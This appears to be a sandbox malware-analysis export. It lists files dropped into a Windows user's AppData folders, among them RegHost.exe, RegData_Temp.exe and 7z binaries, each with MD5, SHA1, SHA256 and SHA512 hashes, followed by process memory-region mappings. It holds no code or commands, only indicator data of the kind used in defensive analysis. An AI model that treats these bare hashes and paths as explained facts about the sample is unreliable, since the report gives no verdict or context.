93e6acd756bdfaac1fce5150ad9db0c7eb99c2185ab519788574da3e577baf61d00048881ae85dcf43c3fac0fa2a6c8628e59b3b254cb11a1bb0c85037ca0d39

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
a4f0311d7dc059b82aeab34cf73e6181

SHA1
e324b758fa7b07a82dc9d4a821d801136d602d20

SHA256
17273e2283ee21baf05b9241c560f35a21a08bc46fc4d291fe2cb7ffb4ab2ff8

SHA512
f8145c79d5bed09c2ebb9daca0e639fc60fee836dbe91a1299414afff1191e431d570ee2282aa3d13e13c515d79c7b4cf142314ed8f2bd24c2c2cf96dd78332e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB
MD5
91a852442ebc1fdcf8a98d077a44035a

SHA1
2b7c8237999add3bebec7d611d5c4ef35b65c082

SHA256
365479df86f751f55d8acf00850680a1edeae8c02ec24d8f7ee19e9d4cf699ea

SHA512
9bceccfa984b6a2d3c90aa43d4db720e81e5cd868de916690a4c2255a5a375794113be575abf5332aeff3d96445b9e78ad304113ac93e73f4fa294fb01e69863

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5UEWTS1K\RegData_Temp[1].zip
MD5
1543b223f63fda679a94d034d23b27ba

SHA1
82eb69d0d096ff966679ce92c4fb2dd5a8dd6f1e

SHA256
30868a1cadb90f598ec9d96f93650c90883941522134b2e0a2dfeca958958e34

SHA512
270de3749322416e371d5177b974450e5e2fbca3570179d2f4811f1fda55aca4ea82cbd0a37d1b56ee8614be154373054b573da854a818caafb41b3cee502f78

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EU9ERU9I\7z[1].dll
MD5
42336b5fc6be24babfb87699c858fb27

SHA1
38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

SHA256
b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

SHA512
f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H29VF4Q1\RegHost_Temp[1].zip
MD5
32ab3a6509fe78d666dcafc5be73f2e1

SHA1
c16e1c2716b4ae5b9e5bfb9773d810344b539126

SHA256
dd2170bbea158a2c2b8c262c2be9c8d91fc3e86efe7f607fce7a9224a389bdec

SHA512
c31ee784de253c4f5c36990959d8e6f74b2b0eeecfd265cab2d5295be33f7af056e144d829adcd754c78e06023816cb3f576110314717ee7e50cc0af507f02fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T6MYL4HM\7z[1].exe
MD5
86e8388e83be8909d148518cf7b6e083

SHA1
4f7fdcf3abc0169b591e502842be074a5188c2c9

SHA256
4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

SHA512
2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\7z.dll
MD5
42336b5fc6be24babfb87699c858fb27

SHA1
38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

SHA256
b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

SHA512
f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\7z.dll
MD5
42336b5fc6be24babfb87699c858fb27

SHA1
38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

SHA256
b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

SHA512
f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
MD5
86e8388e83be8909d148518cf7b6e083

SHA1
4f7fdcf3abc0169b591e502842be074a5188c2c9

SHA256
4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

SHA512
2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
MD5
86e8388e83be8909d148518cf7b6e083

SHA1
4f7fdcf3abc0169b591e502842be074a5188c2c9

SHA256
4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

SHA512
2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
MD5
86e8388e83be8909d148518cf7b6e083

SHA1
4f7fdcf3abc0169b591e502842be074a5188c2c9

SHA256
4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

SHA512
2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
MD5
86e8388e83be8909d148518cf7b6e083

SHA1
4f7fdcf3abc0169b591e502842be074a5188c2c9

SHA256
4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

SHA512
2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.exe
MD5
ce599440cf3ca5610a4167729dc99286

SHA1
74ae9f3d86f4730fee6613e89c80b49d0a998fb6

SHA256
a15f87b02553616bf05e3d5bfe7fc1766d4cd441dfa53519fcd8f826be518883

SHA512
5abcc61c1d16caadcbeb535f5deb7263b2729ed5607e2f4c9382f2a32f8c1cb2e0c7f3b67a675e39982468ff1b9b28ba70c3aa29b1cfa6dc58d9715b27c51da0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.exe
MD5
67a55e73dc3e285f5ecad2f52e4606aa

SHA1
280b8d8083aac33e1b05078bb6706f155cae47c7

SHA256
fc0e21a8e33d53a30207d3e0e3dc9079e253fc623cc4835877cbc39ca7a826a3

SHA512
e12b564cc866d3d50246c4326e0086daa3086adf8084f69c1f0fa49a091ed9a2c93ea07a2f6cc4eec30dea54492dbf12950e8e3e7f6c26208f7b57860f362efe

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip
MD5
1543b223f63fda679a94d034d23b27ba

SHA1
82eb69d0d096ff966679ce92c4fb2dd5a8dd6f1e

SHA256
30868a1cadb90f598ec9d96f93650c90883941522134b2e0a2dfeca958958e34

SHA512
270de3749322416e371d5177b974450e5e2fbca3570179d2f4811f1fda55aca4ea82cbd0a37d1b56ee8614be154373054b573da854a818caafb41b3cee502f78

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip
MD5
1543b223f63fda679a94d034d23b27ba

SHA1
82eb69d0d096ff966679ce92c4fb2dd5a8dd6f1e

SHA256
30868a1cadb90f598ec9d96f93650c90883941522134b2e0a2dfeca958958e34

SHA512
270de3749322416e371d5177b974450e5e2fbca3570179d2f4811f1fda55aca4ea82cbd0a37d1b56ee8614be154373054b573da854a818caafb41b3cee502f78

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
2db2f599b773f36a2ed6c8797e8882df

SHA1
be5f83ef476e83ed5f2a2e77b8046ff86035e0b0

SHA256
8303f7eae4b7cb8020a8c0c1a24ee427438fbbcb2803da6b0e3fd8aa43da6910

SHA512
2876db33ae2278316bad322edc0d49553109dc49d0010475508d19f2fe16d75115742baec319e7d3a8048605a64b78e8bfc8aa00433ada01a2c1cb5aba43d3d4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
2db2f599b773f36a2ed6c8797e8882df

SHA1
be5f83ef476e83ed5f2a2e77b8046ff86035e0b0

SHA256
8303f7eae4b7cb8020a8c0c1a24ee427438fbbcb2803da6b0e3fd8aa43da6910

SHA512
2876db33ae2278316bad322edc0d49553109dc49d0010475508d19f2fe16d75115742baec319e7d3a8048605a64b78e8bfc8aa00433ada01a2c1cb5aba43d3d4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.exe
MD5
04b6b25c3982bf642dd4f8dd2ae8e0b3

SHA1
53dcd3234a461d5c8169cc68da576890d3c9452f

SHA256
57f2aaceba6c8b276fb387d1d305d02ce83b9d67c89177900eeb2486bba6d8ae

SHA512
c49f2b187acaa7a4ca0f2008bd43dfbdf50bb0c766d32ca0ba1e3036bc150a02981e90be4849f7f803d33a9c655b8dc3ad3a340a466427af0f3478fd89286485

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.exe
MD5
9d99b4d43e4e7a0408c5fe99b4cc4afe

SHA1
702436963243f0de2d431ec29b199505a0aa3b90

SHA256
c9e36c039bfc370135feabad11840fe457caec3c4914351461f3f9e115194fb3

SHA512
44620e76efc6d0cefc1c6f8eca77c0114d41fbf4d6e1f6ff2287286ff57aca1679a0428b35c757afb96fd31d99de8b9e1d956b89636d9c373248e5c5b5b05754

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip
MD5
32ab3a6509fe78d666dcafc5be73f2e1

SHA1
c16e1c2716b4ae5b9e5bfb9773d810344b539126

SHA256
dd2170bbea158a2c2b8c262c2be9c8d91fc3e86efe7f607fce7a9224a389bdec

SHA512
c31ee784de253c4f5c36990959d8e6f74b2b0eeecfd265cab2d5295be33f7af056e144d829adcd754c78e06023816cb3f576110314717ee7e50cc0af507f02fe

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip
MD5
32ab3a6509fe78d666dcafc5be73f2e1

SHA1
c16e1c2716b4ae5b9e5bfb9773d810344b539126

SHA256
dd2170bbea158a2c2b8c262c2be9c8d91fc3e86efe7f607fce7a9224a389bdec

SHA512
c31ee784de253c4f5c36990959d8e6f74b2b0eeecfd265cab2d5295be33f7af056e144d829adcd754c78e06023816cb3f576110314717ee7e50cc0af507f02fe

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\ALFBXWTG.txt
MD5
65e487f56b9f40a55989da10e78f3183

SHA1
3c7967bf7adb4ac2df0a6075310789a255f77e5a

SHA256
12444c4f9b53c252f35d42ba42682bd3a5875565122d5a84b634a7826d839856

SHA512
341668689059af23d74f939548b3bdb610f7ee0c5f16de62ee98f613c1c01571c5a07e4ad4991649553b8e3707131e3dbd2bd47ef02215ad7e63072483acf01e

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\7z.dll
MD5
42336b5fc6be24babfb87699c858fb27

SHA1
38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

SHA256
b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

SHA512
f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\7z.dll
MD5
42336b5fc6be24babfb87699c858fb27

SHA1
38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

SHA256
b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

SHA512
f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\7z.dll
MD5
42336b5fc6be24babfb87699c858fb27

SHA1
38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

SHA256
b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

SHA512
f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\7z.dll
MD5
42336b5fc6be24babfb87699c858fb27

SHA1
38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

SHA256
b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

SHA512
f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\7z.exe
MD5
86e8388e83be8909d148518cf7b6e083

SHA1
4f7fdcf3abc0169b591e502842be074a5188c2c9

SHA256
4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

SHA512
2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\7z.exe
MD5
86e8388e83be8909d148518cf7b6e083

SHA1
4f7fdcf3abc0169b591e502842be074a5188c2c9

SHA256
4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

SHA512
2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
2db2f599b773f36a2ed6c8797e8882df

SHA1
be5f83ef476e83ed5f2a2e77b8046ff86035e0b0

SHA256
8303f7eae4b7cb8020a8c0c1a24ee427438fbbcb2803da6b0e3fd8aa43da6910

SHA512
2876db33ae2278316bad322edc0d49553109dc49d0010475508d19f2fe16d75115742baec319e7d3a8048605a64b78e8bfc8aa00433ada01a2c1cb5aba43d3d4

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
2db2f599b773f36a2ed6c8797e8882df

SHA1
be5f83ef476e83ed5f2a2e77b8046ff86035e0b0

SHA256
8303f7eae4b7cb8020a8c0c1a24ee427438fbbcb2803da6b0e3fd8aa43da6910

SHA512
2876db33ae2278316bad322edc0d49553109dc49d0010475508d19f2fe16d75115742baec319e7d3a8048605a64b78e8bfc8aa00433ada01a2c1cb5aba43d3d4

Download Submit
memory/320-56-0x000007FEFC3C1000-0x000007FEFC3C3000-memory.dmp

Filesize
8KB

Download
memory/560-55-0x0000000000000000-mapping.dmp

Download
memory/684-163-0x000000014165D878-mapping.dmp

Download
memory/1120-145-0x0000000000000000-mapping.dmp

Download
memory/1256-144-0x0000000000000000-mapping.dmp

Download
memory/1276-64-0x0000000000000000-mapping.dmp

Download
memory/1336-139-0x0000000000000000-mapping.dmp

Download
memory/1344-137-0x0000000000000000-mapping.dmp

Download
memory/1384-59-0x0000000000000000-mapping.dmp

Download
memory/1652-122-0x0000000000000000-mapping.dmp

Download
memory/1712-115-0x0000000140000000-0x0000000140E38000-memory.dmp

Filesize
14.2MB

Download
memory/1712-116-0x0000000140000000-0x0000000140E38000-memory.dmp

Filesize
14.2MB

Download
memory/1712-108-0x0000000140E36784-mapping.dmp

Download
memory/1712-110-0x0000000140000000-0x0000000140E38000-memory.dmp

Filesize
14.2MB

Download
memory/1712-111-0x000007FFFFBD0000-0x000007FFFFFA1000-memory.dmp

Filesize
3.8MB

Download
memory/1712-112-0x0000000140000000-0x0000000140E38000-memory.dmp

Filesize
14.2MB

Download
memory/1712-113-0x0000000140000000-0x0000000140E38000-memory.dmp

Filesize
14.2MB

Download
memory/1712-114-0x0000000140000000-0x0000000140E38000-memory.dmp

Filesize
14.2MB

Download
memory/1712-104-0x0000000140000000-0x0000000140E38000-memory.dmp

Filesize
14.2MB

Download
memory/1712-107-0x0000000140000000-0x0000000140E38000-memory.dmp

Filesize
14.2MB

Download
memory/1712-117-0x0000000140000000-0x0000000140E38000-memory.dmp

Filesize
14.2MB

Download
memory/1712-118-0x0000000140000000-0x0000000140E38000-memory.dmp

Filesize
14.2MB

Download
memory/1712-99-0x0000000140000000-0x0000000140E38000-memory.dmp

Filesize
14.2MB

Download
memory/1712-93-0x0000000140000000-0x0000000140E38000-memory.dmp

Filesize
14.2MB

Download
memory/1712-91-0x0000000140000000-0x0000000140E38000-memory.dmp

Filesize
14.2MB

Download
memory/1712-106-0x0000000140000000-0x0000000140E38000-memory.dmp

Filesize
14.2MB

Download
memory/1712-88-0x0000000140000000-0x0000000140E38000-memory.dmp

Filesize
14.2MB

Download
memory/1712-86-0x0000000140000000-0x0000000140E38000-memory.dmp

Filesize
14.2MB

Download
memory/1712-85-0x0000000140000000-0x0000000140E38000-memory.dmp

Filesize
14.2MB

Download
memory/1712-103-0x0000000140000000-0x0000000140E38000-memory.dmp

Filesize
14.2MB

Download
memory/1724-79-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1724-83-0x000000014165D878-mapping.dmp

Download
memory/1724-102-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1724-100-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1724-98-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1724-95-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1724-96-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1724-97-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1724-89-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1724-90-0x000007FFFFBD0000-0x000007FFFFFA1000-memory.dmp

Filesize
3.8MB

Download
memory/1724-87-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1724-105-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1724-82-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1724-81-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1724-80-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1724-77-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1724-76-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1724-74-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1724-73-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1724-72-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1724-71-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1724-70-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1812-57-0x0000000000000000-mapping.dmp

Download
memory/1876-65-0x0000000000000000-mapping.dmp

Download